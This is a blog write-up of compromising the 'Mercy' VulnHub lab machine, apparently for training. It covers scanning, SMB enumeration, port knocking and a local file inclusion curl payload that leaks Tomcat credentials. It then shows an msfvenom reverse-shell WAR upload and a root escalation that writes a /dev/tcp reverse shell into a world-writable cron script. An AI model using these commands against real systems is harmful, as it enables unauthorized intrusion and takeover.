Vulnhub | digitalworld.local - Mercy

In this post, I cover the steps I took to fully compromise the Mercy box in the Digital World series.

8 months ago   •   19 min read

By 0xBEN
Table of contents

Nmap Scan

# Nmap 7.91 scan initiated Sun Sep 19 19:05:11 2021 as: nmap -T4 -p- -A -oA scan-advanced 10.9.9.23  
Nmap scan report for MERCY.cyber.range (10.9.9.23)  
Host is up (0.00043s latency).  
Not shown: 65525 closed ports  
PORT     STATE    SERVICE     VERSION  
22/tcp   filtered ssh  
53/tcp   open     domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)  
| dns-nsid:    
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu  
80/tcp   filtered http  
110/tcp  open     pop3        Dovecot pop3d  
|_pop3-capabilities: UIDL SASL TOP AUTH-RESP-CODE RESP-CODES PIPELINING CAPA STLS  
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server  
| Not valid before: 2018-08-24T13:22:55  
|_Not valid after:  2028-08-23T13:22:55  
|_ssl-date: TLS randomness does not represent time  
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)  
143/tcp  open     imap        Dovecot imapd (Ubuntu)  
|_imap-capabilities: IDLE OK listed LOGIN-REFERRALS have more post-login capabilities ID STARTTLS Pre-login SASL-IR LITERAL+  
ENABLE IMAP4rev1 LOGINDISABLEDA0001  
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server  
| Not valid before: 2018-08-24T13:22:55  
|_Not valid after:  2028-08-23T13:22:55  
|_ssl-date: TLS randomness does not represent time  
445/tcp  open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)  
993/tcp  open     ssl/imap    Dovecot imapd (Ubuntu)  
|_imap-capabilities: IDLE OK listed LOGIN-REFERRALS have AUTH=PLAINA0001 more ID Pre-login SASL-IR capabilities LITERAL+ ENA  
BLE IMAP4rev1 post-login  
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server  
| Not valid before: 2018-08-24T13:22:55  
|_Not valid after:  2028-08-23T13:22:55  
|_ssl-date: TLS randomness does not represent time  
995/tcp  open     ssl/pop3    Dovecot pop3d  
|_pop3-capabilities: UIDL USER SASL(PLAIN) AUTH-RESP-CODE RESP-CODES PIPELINING CAPA TOP  
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server  
| Not valid before: 2018-08-24T13:22:55  
|_Not valid after:  2028-08-23T13:22:55  
|_ssl-date: TLS randomness does not represent time  
8080/tcp open     http        Apache Tomcat/Coyote JSP engine 1.1  
| http-methods:    
|_  Potentially risky methods: PUT DELETE  
|_http-open-proxy: Proxy might be redirecting requests  
| http-robots.txt: 1 disallowed entry    
|_/tryharder/tryharder  
|_http-server-header: Apache-Coyote/1.1  
|_http-title: Apache Tomcat  
Device type: general purpose  
Running: Linux 3.X|4.X  
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4  
OS details: Linux 3.11 - 4.1  
Network Distance: 2 hops  
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel  
  
Host script results:  
|_clock-skew: mean: -2h40m01s, deviation: 4h37m07s, median: -1s  
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)  
| smb-os-discovery:    
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)  
|   Computer name: mercy  
|   NetBIOS computer name: MERCY\x00  
|   Domain name: \x00  
|   FQDN: mercy  
|_  System time: 2021-09-20T07:05:26+08:00  
| smb-security-mode:    
|   account_used: guest  
|   authentication_level: user  
|   challenge_response: supported  
|_  message_signing: disabled (dangerous, but default)  
| smb2-security-mode:    
|   2.02:    
|_    Message signing enabled but not required  
| smb2-time:    
|   date: 2021-09-19T23:05:26  
|_  start_date: N/A  
  
TRACEROUTE (using port 199/tcp)  
HOP RTT     ADDRESS  
1   0.22 ms pfSense.cyber.range (10.0.0.1)  
2   0.38 ms MERCY.cyber.range (10.9.9.23)  
  
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
# Nmap done at Sun Sep 19 19:05:35 2021 -- 1 IP address (1 host up) scanned in 24.70 seconds




Service Enumeration

SMB

target=10.9.9.23
smbclient -L //$target --option="client min protocol=core" -U ''
Attempt to anonymously enumerate shares
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        qiu             Disk      
        IPC$            IPC       IPC Service (MERCY server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP             

I am able to list some shares, but I do not have anonymous access to any of these shares. But, I do have a credential from a previous box in the series.

  • Username: qiu
  • Password: password
smbclient //$target/qiu --option="client min protocol=core" -U 'qiu'

I am able to map the qiu share and take a look around. There is a config file in the share, which appears to have the configurations for several services on the target.

Here are settings for your perusal.

Port Knocking Daemon Configuration

[options]
	UseSyslog

[openHTTP]
	sequence    = 159,27391,4
	seq_timeout = 100
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
	tcpflags    = syn

[closeHTTP]
	sequence    = 4,27391,159
	seq_timeout = 100
	command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
	tcpflags    = syn

[openSSH]
	sequence    = 17301,28504,9999
	seq_timeout = 100
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn

[closeSSH]
	sequence    = 9999,28504,17301
	seq_timeout = 100
	command     = /sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn

Apache2 Configuration

# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.4/ for detailed information about
# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
# hints.
#
#
# Summary of how the Apache 2 configuration works in Debian:
# The Apache 2 web server configuration in Debian is quite different to
# upstream's suggested way to configure the web server. This is because Debian's
# default Apache2 installation attempts to make adding and removing modules,
# virtual hosts, and extra configuration directives as flexible as possible, in
# order to make automating the changes and administering the server as easy as
# possible.

# It is split into several files forming the configuration hierarchy outlined
# below, all located in the /etc/apache2/ directory:
#
#	/etc/apache2/
#	|-- apache2.conf
#	|	`--  ports.conf
#	|-- mods-enabled
#	|	|-- *.load
#	|	`-- *.conf
#	|-- conf-enabled
#	|	`-- *.conf
# 	`-- sites-enabled
#	 	`-- *.conf
#
#
# * apache2.conf is the main configuration file (this file). It puts the pieces
#   together by including all remaining configuration files when starting up the
#   web server.
#
# * ports.conf is always included from the main configuration file. It is
#   supposed to determine listening ports for incoming connections which can be
#   customized anytime.
#
# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
#   directories contain particular configuration snippets which manage modules,
#   global configuration fragments, or virtual host configurations,
#   respectively.
#
#   They are activated by symlinking available configuration files from their
#   respective *-available/ counterparts. These should be managed by using our
#   helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
#   their respective man pages for detailed information.
#
# * The binary is called apache2. Due to the use of environment variables, in
#   the default configuration, apache2 needs to be started/stopped with
#   /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
#   work with the default configuration.


# Global configuration
#

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE!  If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the Mutex documentation (available
# at <URL:http://httpd.apache.org/docs/2.4/mod/core.html#mutex>);
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
#ServerRoot "/etc/apache2"

#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
Mutex file:${APACHE_LOCK_DIR} default

#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}

#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300

#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On

#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100

#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 5


# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}

#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off

# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a <VirtualHost>
# container, error messages relating to that virtual host will be
# logged here.  If you *do* define an error logfile for a <VirtualHost>
# container, that host's errors will be logged there and not here.
#
ErrorLog ${APACHE_LOG_DIR}/error.log

#
# LogLevel: Control the severity of messages logged to the error_log.
# Available values: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the log level for particular modules, e.g.
# "LogLevel info ssl:warn"
#
LogLevel warn

# Include module configuration:
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf

# Include list of ports to listen on
Include ports.conf


# Sets the default security model of the Apache2 HTTPD server. It does
# not allow access to the root filesystem outside of /usr/share and /var/www.
# The former is used by web applications packaged in Debian,
# the latter may be used for local directories served by the web server. If
# your system is serving content from a sub-directory in /srv you must allow
# access here, or in any related virtual host.
<Directory />
	Options FollowSymLinks
	AllowOverride None
	Require all denied
</Directory>

<Directory /usr/share>
	AllowOverride None
	Require all granted
</Directory>

<Directory /var/www/>
	Options Indexes FollowSymLinks
	AllowOverride None
	Require all granted
</Directory>

#<Directory /srv/>
#	Options Indexes FollowSymLinks
#	AllowOverride None
#	Require all granted
#</Directory>




# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives.  See also the AllowOverride
# directive.
#
AccessFileName .htaccess

#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#
<FilesMatch "^\.ht">
	Require all denied
</FilesMatch>


#
# The following directives define some format nicknames for use with
# a CustomLog directive.
#
# These deviate from the Common Log Format definitions in that they use %O
# (the actual bytes sent including headers) instead of %b (the size of the
# requested file), because the latter makes it impossible to detect partial
# requests.
#
# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
# Use mod_remoteip instead.
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent

# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.

# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf

# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

Samba Configuration

#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which 
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
#  - When such options are commented with ";", the proposed setting
#    differs from the default Samba behaviour
#  - When commented with "#", the proposed setting is the default
#    behaviour of Samba but the option is considered important
#    enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic 
# errors. 

#======================= Global Settings =======================

[global]

## Browsing/Identification ###

# Change this to the workgroup/NT-domain name your Samba server will part of
   workgroup = WORKGROUP

# server string is the equivalent of the NT Description field
	server string = %h server (Samba, Ubuntu)

# Windows Internet Name Serving Support Section:
# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
#   wins support = no

# WINS Server - Tells the NMBD components of Samba to be a WINS Client
# Note: Samba can be either a WINS Server, or a WINS Client, but NOT both
;   wins server = w.x.y.z

# This will prevent nmbd to search for NetBIOS names through DNS.
   dns proxy = no

#### Networking ####

# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
;   interfaces = 127.0.0.0/8 eth0

# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself.  However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
;   bind interfaces only = yes



#### Debugging/Accounting ####

# This tells Samba to use a separate log file for each machine
# that connects
   log file = /var/log/samba/log.%m

# Cap the size of the individual log files (in KiB).
   max log size = 1000

# If you want Samba to only log through syslog then set the following
# parameter to 'yes'.
#   syslog only = no

# We want Samba to log a minimum amount of information to syslog. Everything
# should go to /var/log/samba/log.{smbd,nmbd} instead. If you want to log
# through syslog you should set the following parameter to something higher.
   syslog = 0

# Do something sensible when Samba crashes: mail the admin a backtrace
   panic action = /usr/share/samba/panic-action %d


####### Authentication #######

# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller". 
#
# Most people will want "standalone sever" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
   server role = standalone server

# If you are using encrypted passwords, Samba will need to know what
# password database type you are using.  
   passdb backend = tdbsam

   obey pam restrictions = yes

# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
   unix password sync = yes

# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
   passwd program = /usr/bin/passwd %u
   passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .

# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
   pam password change = yes

# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
   map to guest = bad user

########## Domains ###########

#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set 
#

# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
;   logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
#   logon path = \\%N\%U\profile

# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
;   logon drive = H:
#   logon home = \\%N\%U

# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
;   logon script = logon.cmd

# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe.  The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u

# This allows machine accounts to be created on the domain controller via the 
# SAMR RPC pipe.  
# The following assumes a "machines" group exists on the system
; add machine script  = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u

# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.  
; add group script = /usr/sbin/addgroup --force-badname %g

############ Misc ############

# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
;   include = /home/samba/etc/smb.conf.%m

# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
;   idmap uid = 10000-20000
;   idmap gid = 10000-20000
;   template shell = /bin/bash

# Setup usershare options to enable non-root users to share folders
# with the net usershare command.

# Maximum number of usershare. 0 (default) means that usershare is disabled.
;   usershare max shares = 100

# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
   usershare allow guests = yes

#======================= Share Definitions =======================

# Un-comment the following (and tweak the other settings below to suit)
# to enable the default home directory shares. This will share each
# user's home directory as \\server\username
;[homes]
;   comment = Home Directories
;   browseable = no

# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
;   read only = yes

# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
;   create mask = 0700

# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
;   directory mask = 0700

# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# Un-comment the following parameter to make sure that only "username"
# can connect to \\server\username
# This might need tweaking when using external authentication schemes
;   valid users = %S

# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
;   comment = Network Logon Service
;   path = /home/samba/netlogon
;   guest ok = yes
;   read only = yes

# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
;   comment = Users profiles
;   path = /home/samba/profiles
;   guest ok = no
;   browseable = no
;   create mask = 0600
;   directory mask = 0700

[printers]
   comment = All Printers
   browseable = no
   path = /var/spool/samba
   printable = yes
   guest ok = no
   read only = yes
   create mask = 0700

# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
;   write list = root, @lpadmin

[qiu]
path = /home/qiu
valid users = qiu
read only = yes

For other details of MERCY, please contact your system administrator.




HTTP (TCP/80)

I used the port knock sequence discovered in the SMB enumeration to open port TCP 80.





Gobuster Enumeration

gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 100 -o gobuster-out -x php,html

/index.html           (Status: 200) [Size: 90]
/time                 (Status: 200) [Size: 79]
/login.html           (Status: 200) [Size: 67]




robots.txt

User-agent: *
Disallow: /mercy
Disallow: /nomercy

/nomercy

Check the page: http://10.9.9.23/nomercy

Looking at the version of this application in searchsploit, it should be vulnerable to Local File Inclusion (LFI).

RIPS 0.53 - Multiple Local File Inclusions | php/webapps/18660.txt`

Try reading the local tomcat7 configuration, which reveals a login credential:

curl http://10.9.9.23/nomercy/windows/code.php?file=../../../../../../../../../var/lib/tomcat7/conf/tomcat-users.xml

<user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>

<user username="fluffy" password="freakishfluffybunny" roles="none"/>

Bonus, I even found it's susceptible to Remote File Inclusion (RFI) – notice the address bar in the image:





HTTP (TCP/8080)





Gobuster Enumeration

gobuster dir -u http://$target:8080 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 100 -o gobuster-out -x php,html

/docs                 (Status: 302) [Size: 0] [--> http://10.9.9.23:8080/docs/]  
/index.html           (Status: 200) [Size: 1895]  
/examples             (Status: 302) [Size: 0] [--> http://10.9.9.23:8080/examples/]  
/manager              (Status: 302) [Size: 0] [--> http://10.9.9.23:8080/manager/]  
/http%3A%2F%2Fwww     (Status: 400) [Size: 0]  
/http%3A%2F%2Fwww.php (Status: 400) [Size: 0]  
/http%3A%2F%2Fwww.html (Status: 400) [Size: 0]




robots.txt

/tryharder/tryharder

http:/10.9.9.23/tryharder/tryharder is just a file with some base 64 encoded text. I run the following command to decode it:

curl http://$target:8080/tryharder/tryharder | base64 -d
It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.




Tomcat Manager

The enumeration on TCP 80 revealed a credential to login into the Tomcat Web Application Manager. I navigate to http://10.9.9.23:8080/manager and sign in with the credential fluffy:freakishfluffybunny.





SSH

I used the port knock sequence to open the SSH port, but none of the credentials I had discovered were valid logins.





Exploit

Overview

Previously discovered credentials from – which were guessable to being with – exposed configuration files in an SMB share. Using information from the configuration file, I sent the port knocking sequence to open SSH and HTTP ports.

I found a LFI bug in the web application running on TCP 80, which allowed me to read the Tomcat configuration file. Cleartext credentials hardcoded in tomcat-users.xml file allowed access to the Tomcat Manager where a malicious WAR file was uploaded to obtain a reverse shell.





Malicious WAR File

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.2 LPORT=443 -f war -o shell.war
Upload and deploy

Start a netcat listener on TCP 443, click the /shell link and catch the reverse shell.





Post-Exploitation

Environment

Current User

id
uid=116(tomcat7) gid=126(tomcat7) groups=126(tomcat7)

sudo -l
Sorry, user tomcat7 may not run sudo on MERCY.




OS and Kernel

uname -a
Linux MERCY 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux


cat /etc/*release

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"




Users and Groups

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
landscape:x:102:105::/var/lib/landscape:/bin/false
mysql:x:103:107:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:104:109::/var/run/dbus:/bin/false
bind:x:105:116::/var/cache/bind:/bin/false
postfix:x:106:117::/var/spool/postfix:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
dovecot:x:108:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:109:120:Dovecot login user,,,:/nonexistent:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:111:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
avahi:x:112:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:113:124:colord colour management daemon,,,:/var/lib/colord:/bin/false
libvirt-qemu:x:114:108:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:115:125:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
tomcat7:x:116:126::/usr/share/tomcat7:/bin/false
pleadformercy:x:1000:1000:pleadformercy:/home/pleadformercy:/bin/bash
qiu:x:1001:1001:qiu:/home/qiu:/bin/bash
thisisasuperduperlonguser:x:1002:1002:,,,:/home/thisisasuperduperlonguser:/bin/bash
fluffy:x:1003:1003::/home/fluffy:/bin/sh

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,pleadformercy
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:pleadformercy
floppy:x:25:
tape:x:26:
sudo:x:27:pleadformercy
audio:x:29:
dip:x:30:pleadformercy
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:pleadformercy
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
netdev:x:102:
crontab:x:103:
syslog:x:104:
landscape:x:105:
fuse:x:106:
mysql:x:107:
kvm:x:108:
messagebus:x:109:
ssl-cert:x:110:postgres
lpadmin:x:111:pleadformercy
scanner:x:112:
sambashare:x:113:pleadformercy
mlocate:x:114:
ssh:x:115:
bind:x:116:
postfix:x:117:
postdrop:x:118:
dovecot:x:119:
dovenull:x:120:
postgres:x:121:
avahi:x:122:
winbindd_priv:x:123:
colord:x:124:
libvirtd:x:125:pleadformercy
tomcat7:x:126:
pleadformercy:x:1000:
qiu:x:1001:
thisisasuperduperlonguser:x:1002:
fluffy:x:1003:




Scheduled Tasks

None.





Interesting Files

  • /var/www/html/time

Has a timestamp that is being updated every three minutes. Possibly script somewhere that I can abuse.

  • /home/fluffy/.private/secrets
ls -l ./.private/secrets

total 20
drwxr-xr-x 2 fluffy fluffy 4096 Nov 20  2018 .
drwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 ..
-rwxr-xr-x 1 fluffy fluffy   37 Nov 20  2018 backup.save
-rw-r--r-- 1 fluffy fluffy   12 Nov 20  2018 .secrets
-rwxrwxrwx 1 root   root    222 Nov 20  2018 timeclock




Privilege Escalation

The file /home/fluffy/.private/secrets/timeclock is globally writeable. This script is being run every three minutes. I can overwrite the file with a reverse shell payload.

cd /home/fluffy/.private/secrets
echo '#/bin/bash' > timeclock
echo 'bash -i >& /dev/tcp/10.0.0.2/80 0>&1' >> timeclock

Start a reverse shell on TCP 80 and wait for the script to run.

root.txt

Spread the word

Keep reading